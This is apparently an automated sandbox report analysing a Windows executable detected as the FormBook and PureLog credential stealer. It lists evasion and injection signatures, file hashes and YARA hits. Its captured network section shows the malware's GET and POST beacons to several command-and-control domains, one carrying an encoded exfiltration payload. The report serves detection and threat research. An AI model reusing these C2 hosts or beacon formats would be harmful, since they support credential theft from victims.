Windows Analysis Report
dGHiTqj3AB.exe

Overview

General Information

Sample name:	dGHiTqj3AB.exe renamed because original name is a hash value
Original sample name:	1f5c95d40c06c01300f0a6592945a72d.exe
Analysis ID:	1483009
MD5:	1f5c95d40c06c01300f0a6592945a72d
SHA1:	79a217ed19833efcf640ffd8bb04803e9f30d6f4
SHA256:	434ec59b680788bae7f2935200a77e681cecbb517d853c6e6cf31f4cf112e5cc
Tags:	32exetrojan
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Yara detected FormBook

Source: Yara match	File source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: dGHiTqj3AB.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: dGHiTqj3AB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dGHiTqj3AB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mcbuilder.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: amWV.pdb source: dGHiTqj3AB.exe
Source:	Binary string: amWV.pdbSHA256 source: dGHiTqj3AB.exe
Source:	Binary string: mcbuilder.pdb source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fgebfePlJm.exe, 00000007.00000000.2188191018.000000000092E000.00000002.00000001.01000000.0000000C.sdmp, fgebfePlJm.exe, 00000009.00000000.2469561771.000000000092E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: dGHiTqj3AB.exe, dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\mcbuilder.exe

Code function: 8_2_030AC410 FindFirstFileW,FindNextFileW,FindClose,

8_2_030AC410

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 4x nop then xor eax, eax		8_2_03099B20
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 4x nop then mov ebx, 00000004h		8_2_03BB04E8

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 3.33.130.190 3.33.130.190

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E= HTTP/1.1Host: www.accelbusiness.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.bosonserver.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik= HTTP/1.1Host: www.hourglasspoise.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.asymtos.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /ukrf/?bPD=F/tpX3aJNzQcZIorwLh3+lvUFPUZ/CrYoWsqF027uxYn9zYWtTXD7TxpBDgZUhfyO+VwBO4Do9/nXXxf/u2OALcIo7otd0ARGQzWw/PbAY7nMJoOO6tnPWI=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.lontos.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.theiconsummit.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0= HTTP/1.1Host: www.accessoriestechbd.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0

Source: global traffic	DNS traffic detected: DNS query: www.accelbusiness.net
Source: global traffic	DNS traffic detected: DNS query: www.bosonserver.net
Source: global traffic	DNS traffic detected: DNS query: www.hourglasspoise.net
Source: global traffic	DNS traffic detected: DNS query: www.asymtos.tech
Source: global traffic	DNS traffic detected: DNS query: www.lontos.top
Source: global traffic	DNS traffic detected: DNS query: www.theiconsummit.life
Source: global traffic	DNS traffic detected: DNS query: www.accessoriestechbd.com

Source: unknown

HTTP traffic detected: POST /x10g/ HTTP/1.1Host: www.bosonserver.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 200Cache-Control: no-cacheConnection: closeOrigin: http://www.bosonserver.netReferer: http://www.bosonserver.net/x10g/User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 62 50 44 3d 4e 76 67 4a 61 2b 53 75 63 52 4c 45 4f 48 41 4e 5a 70 66 54 30 73 34 54 52 37 72 6e 30 53 6f 54 66 4a 68 2f 6e 44 76 34 77 34 52 71 52 70 54 35 49 47 4b 56 64 68 2f 65 56 39 70 58 4a 4b 69 4e 34 69 4d 6b 58 42 38 6e 70 31 69 4c 4a 76 4f 6d 32 32 31 6d 30 74 54 72 50 38 63 79 34 5a 67 4c 41 33 2b 75 65 4f 31 44 59 39 52 4b 61 59 59 49 56 63 4f 69 44 58 6f 74 75 55 65 65 63 33 7a 30 71 41 70 30 76 6e 58 4c 79 59 67 51 32 36 41 36 31 31 66 4f 76 6e 51 30 47 37 65 37 49 48 51 46 65 5a 47 2f 79 47 75 49 48 45 46 59 32 74 64 4a 2b 66 66 78 73 56 54 38 69 4b 2f 42 55 31 73 73 30 67 3d 3d Data Ascii: bPD=NvgJa+SucRLEOHANZpfT0s4TR7rn0SoTfJh/nDv4w4RqRpT5IGKVdh/eV9pXJKiN4iMkXB8np1iLJvOm221m0tTrP8cy4ZgLA3+ueO1DY9RKaYYIVcOiDXotuUeec3z0qAp0vnXLyYgQ26A611fOvnQ0G7e7IHQFeZG/yGuIHEFY2tdJ+ffxsVT8iK/BU1ss0g==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 26 Jul 2024 11:58:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 26 Jul 2024 11:58:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 